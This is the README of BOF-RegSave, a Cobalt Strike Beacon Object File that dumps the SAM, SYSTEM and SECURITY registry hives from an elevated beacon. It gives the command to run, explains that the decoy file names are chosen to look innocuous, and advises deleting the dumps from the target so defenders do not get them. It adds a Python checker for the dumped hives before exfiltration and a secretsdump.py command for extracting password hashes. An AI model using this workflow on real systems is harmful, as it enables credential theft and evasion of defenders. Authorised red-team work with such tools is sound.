Dumping SAM / SECURITY / SYSTEM registry hives with a Beacon Object File

EncodeGroup/BOF-RegSave

About

Beacon Object File (BOF) for Cobalt Strike that enables the privilege it needs and saves the SAM, SYSTEM and SECURITY registry hives to disk for offline parsing and hash extraction. Run it from an elevated beacon: saving these hives requires SeBackupPrivilege, which only Administrators and Backup Operators hold.

Instructions

Load the CNA script in Cobalt Strike; it registers the bof-regsave command, which takes the output directory as its argument:

beacon> bof-regsave c:\temp\

By default the output is written to the following files in that directory. The names are chosen to look innocuous; the content of each file is the saved registry hive, not text:

samantha.txt - SAM
systemic.txt - SYSTEM
security.txt - SECURITY

The file names can be changed by editing entry.c. Download the files and remove them from the target when you are done; they are the material an offline parser needs, and leaving them behind hands the same material to the defender.
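Before exfiltrating or parsing the three files it is worth confirming that each one is an intact hive. Every hive file starts with a 4 KiB base block signed "regf", which carries the hive name, a version, two sequence numbers and a checksum. The checker below is an added example, not code from BOF-RegSave; it assumes the saved files are standard regf hive files (the format RegSaveKey produces), and the sample hive it builds is constructed in-line, with the embedded path chosen as an assumption and no real account data.

```python
"""Sanity-check dumped registry hives before parsing them offline.

Every hive file begins with a 4 KiB 'regf' base block.  Checking it catches the
dumps that waste time later: not a hive at all, truncated or damaged in transit
(checksum mismatch), or saved while dirty (sequence numbers differ, so some
writes exist only in the .LOG transaction files).
"""
import struct
import sys
from datetime import datetime, timedelta, timezone

BASE_BLOCK_SIZE = 0x1000                    # hive bins start right after the base block
CHECKSUM_OFFSET = 0x1FC                     # XOR-32 over the 127 dwords before it
FILENAME_OFFSET, FILENAME_SIZE = 0x30, 64   # UTF-16LE, NUL padded
HEADER_FMT = "<4sIIQIIIIIII"                # signature .. clustering factor (0x00-0x2F)
EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)


def regf_checksum(block: bytes) -> int:
    """XOR of the first 508 bytes as little-endian dwords; Windows remaps the two
    reserved results (0 -> 1, 0xFFFFFFFF -> 0xFFFFFFFE)."""
    x = 0
    for (dword,) in struct.iter_unpack("<I", block[:CHECKSUM_OFFSET]):
        x ^= dword
    if x == 0xFFFFFFFF:
        return 0xFFFFFFFE
    return x or 1


def filetime_to_datetime(ft: int) -> datetime:
    """FILETIME is 100 ns ticks since 1601-01-01 UTC."""
    return EPOCH_1601 + timedelta(microseconds=ft // 10)


def parse_regf(data: bytes) -> dict:
    """Parse the base block and list anything that makes the dump suspect."""
    if len(data) < BASE_BLOCK_SIZE:
        raise ValueError(f"only {len(data)} bytes, shorter than a regf base block")
    (sig, seq1, seq2, ft, major, minor, ftype, _fformat,
     root_cell, bins_size, _cluster) = struct.unpack_from(HEADER_FMT, data, 0)
    if sig != b"regf":
        raise ValueError(f"bad signature {sig!r}: not a registry hive")
    raw_name = data[FILENAME_OFFSET:FILENAME_OFFSET + FILENAME_SIZE]
    name = raw_name.decode("utf-16-le", errors="replace").split("\x00", 1)[0]
    stored_sum = struct.unpack_from("<I", data, CHECKSUM_OFFSET)[0]

    problems = []
    if regf_checksum(data) != stored_sum:
        problems.append("base block checksum mismatch (truncated or corrupted copy)")
    if seq1 != seq2:
        problems.append(f"dirty hive: sequence numbers {seq1} != {seq2} "
                        "(latest writes are still in the .LOG files)")
    if ftype != 0:
        problems.append(f"file type {ftype} is not a primary hive file")
    if major != 1 or not 3 <= minor <= 6:
        problems.append(f"unexpected hive format version {major}.{minor}")
    if BASE_BLOCK_SIZE + bins_size > len(data):
        problems.append("hive bins size exceeds file size (dump is truncated)")
    if data[BASE_BLOCK_SIZE:BASE_BLOCK_SIZE + 4] != b"hbin":
        problems.append("first hive bin signature missing after the base block")
    return {
        "name": name, "version": f"{major}.{minor}",
        "last_written": filetime_to_datetime(ft), "sequence": (seq1, seq2),
        "root_cell_offset": root_cell, "bins_size": bins_size,
        "problems": problems, "ok": not problems,
    }


def build_sample_hive(name: str, dirty: bool = False, corrupt: bool = False) -> bytes:
    """Constructed test input (not a real SAM dump): a valid base block followed by
    one empty hive bin.  'name' is whatever the caller wants in the file-name field."""
    seq = 7
    td = datetime(2020, 10, 8, tzinfo=timezone.utc) - EPOCH_1601
    ticks = (td.days * 86400 + td.seconds) * 10_000_000 + td.microseconds * 10
    hdr = bytearray(BASE_BLOCK_SIZE)
    struct.pack_into(HEADER_FMT, hdr, 0, b"regf", seq + 1 if dirty else seq, seq, ticks,
                     1, 5, 0, 1, 0x20, 0x1000, 1)
    hdr[FILENAME_OFFSET:FILENAME_OFFSET + FILENAME_SIZE] = \
        name.encode("utf-16-le")[:FILENAME_SIZE].ljust(FILENAME_SIZE, b"\x00")
    struct.pack_into("<I", hdr, CHECKSUM_OFFSET, regf_checksum(hdr))
    if corrupt:
        hdr[0x80] ^= 0xFF             # damage a reserved byte inside the checksummed region
    hbin = bytearray(0x1000)
    struct.pack_into("<4sII", hbin, 0, b"hbin", 0, 0x1000)   # signature, offset, size
    return bytes(hdr + hbin)


if __name__ == "__main__":
    # Usage: python check_hive.py samantha.txt systemic.txt security.txt
    for path in sys.argv[1:]:
        with open(path, "rb") as f:
            info = parse_regf(f.read())
        print(path, "OK" if info["ok"] else "PROBLEMS", info["name"], info["last_written"])
        for p in info["problems"]:
            print("   -", p)
```

A hive written by a registry save is normally clean (equal sequence numbers); the dirty check matters more for hives copied straight from disk, where the latest writes may still sit in the .LOG files. Once the files check out they can be parsed offline with the usual tooling, for example impacket's secretsdump.py -sam samantha.txt -system systemic.txt -security security.txt LOCAL.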

Credits

Template and Makefile based on the repository by @realoriginal

Reading material for BOF

CS Beacon Object Files

Aggressor-Script functions

Beacon Object Files - Luser Demo

A Developer's Introduction To Beacon Object Files

Github repos

https://github.com/rsmudge/ZeroLogon-BOF
https://github.com/rsmudge/CVE-2020-0796-BOF
https://github.com/trustedsec/CS-Situational-Awareness-BOF
https://github.com/tomcarver16/BOF-DLL-Inject
https://github.com/m57/cobaltstrike_bofs/
https://github.com/rvrsh3ll/BOF_Collection/
https://github.com/realoriginal/bof-NetworkServiceEscalate

Author

@leftp